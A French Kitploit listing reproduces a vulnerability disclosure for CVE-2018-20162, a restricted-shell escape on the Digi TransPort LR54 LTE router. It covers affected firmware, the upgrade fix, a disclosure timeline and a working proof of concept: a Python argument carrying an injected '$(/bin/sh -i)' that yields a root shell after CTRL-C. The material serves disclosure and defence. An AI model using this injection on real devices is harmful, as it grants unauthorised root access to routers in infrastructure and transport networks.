Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2018-20162-digi-lr54-restricted-shell-escape — Preuve de concept d'exploit pour CVE-2018-20162 : évasion de sandbox dans le routeur LTE Digi TransPort LR54 via une faille de gestion SIGINT, permettant un accès root au shell. | Kitploit
Outils/GitHubGitHub/stigtsp/cve-2018-20162-digi-lr54-restricted-shell-escape
Sécurité des Systèmes EmbarquésEscalade de PrivilègesSécurité IoTAnalyse des VulnérabilitésExploitationTests d'IntrusionSécurité Matériel et IoTRed Teaming

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
GitHub
stigtsp/cve-2018-20162-digi-lr54-restricted-shell-escape

CVE-2018-20162-digi-lr54-restricted-shell-escape

Preuve de concept d'exploit pour CVE-2018-20162 : évasion de sandbox dans le routeur LTE Digi TransPort LR54 via une faille de gestion SIGINT, permettant un accès root au shell.

Voir le dépôt
2il y a 7 ansPas encore vérifié

layout: post title: "CVE-2018-20162 : Évasion de Shell Restreint sur Digi TransPort LR54" author: sgo category: sécurité

Le Digi TransPort LR54 est un routeur LTE haut débit couramment utilisé par l'industrie, les infrastructures, le commerce de détail et les transports publics.

Il prend en charge l'exécution de scripts Python dans un bac à sable restreint et dispose d'un shell personnalisé accessible via SSH, soumis aux mêmes restrictions. Le système d'exploitation sous-jacent est donc inaccessible à l'administrateur.

J'ai trouvé un moyen de sortir du bac à sable et d'obtenir un shell root en exploitant la façon dont l'interface en ligne de commande gère les arguments de ligne de commande lors de l'exécution de scripts Python :

Lorsqu'un processus Python interactif reçoit un SIGINT (via CTRL-C), les arguments du script ne sont pas correctement échappés lorsqu'ils sont transmis au gestionnaire de journalisation des erreurs de l'interface interactive. Cela permet à un attaquant d'exécuter des commandes arbitraires en tant que root.

Pour exploiter cette vulnérabilité, un attaquant doit avoir un accès interactif à l'interface en ligne de commande avec des privilèges 'super'. Un utilisateur disposant de ce niveau d'accès est activé par défaut sur l'appareil.

Vulnérable

Digi Transport LR54 (et peut-être des produits associés comme WR64 et WR54)

Version du firmware : 4.4.0.26 10/29/2018 21:14:06 Version du firmware : 4.3.2.24 09/06/2018 00:58:34

Et peut-être des versions antérieures

Atténuation

Les utilisateurs devraient mettre à niveau vers la version du firmware 4.5.1.4 ou plus récente. Les secrets stockés sur l'appareil, comme les clés privées et les phrases de passe, devraient être changés par précaution.

Preuve de Concept

  1. Téléchargez sleep.py vers le LR54 en utilisant scp ou sftp, contenant :
root@kitploit:~
import time;time.sleep(10)
  1. Exécutez la commande suivante dans le CLI du LR54 :
root@kitploit:~
python sleep.py --XXX $(/bin/sh -i >&2)
  1. Appuyez immédiatement sur CTRL-C après le démarrage du programme

  2. Vous êtes alors déposé dans un shell racine interactif

root@kitploit:~
/home/digi/user # uname -a
Linux (none) 3.10.14 #1 SMP Mon Oct 29 16:18:10 CDT 2018 mips GNU/Linux
/home/digi/user # id
uid=0(root) gid=2000(users_rw) groups=2000(users_rw),2002(users_super)

Chronologie

  • 2018-12-13 : Vulnérabilité découverte
  • 2018-12-14 : PoC créé, fournisseur notifié
  • 2018-12-14 : Fournisseur confirmé, embargo de 60 jours. Demande de CVE.
  • 2018-12-15 : CVE-2018-20162 attribué
  • 2018-12-31 : Reçu un firmware préliminaire. Confirmé non vulnérable.
  • 2019-01-02 : Le fournisseur publie un firmware corrigé 4.5.1.4
  • 2019-01-25 : Le fournisseur met à jour les notes de version pour référencer CVE-2018-20162
  • 2019-02-13 : Le fournisseur approuve la divulgation, embargo levé

Références

  • https://www.digi.com/products/networking/cellular-routers/digi-transport-lr54
  • http://ftp1.digi.com/support/firmware/transport/LR54/v4.5.1.4/93001306_L.pdf
  • https://www.digi.com/resources/security
  • https://blog.hackeriet.no/cve-2018-20162-digi-lr54-restricted-shell-escape
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20162

Crédits

Vulnérabilité découverte par Stig Palmquist.

Merci à @duniel_pls et @alexanderkjall pour la relecture de ce rapport.

Télécharger l’outil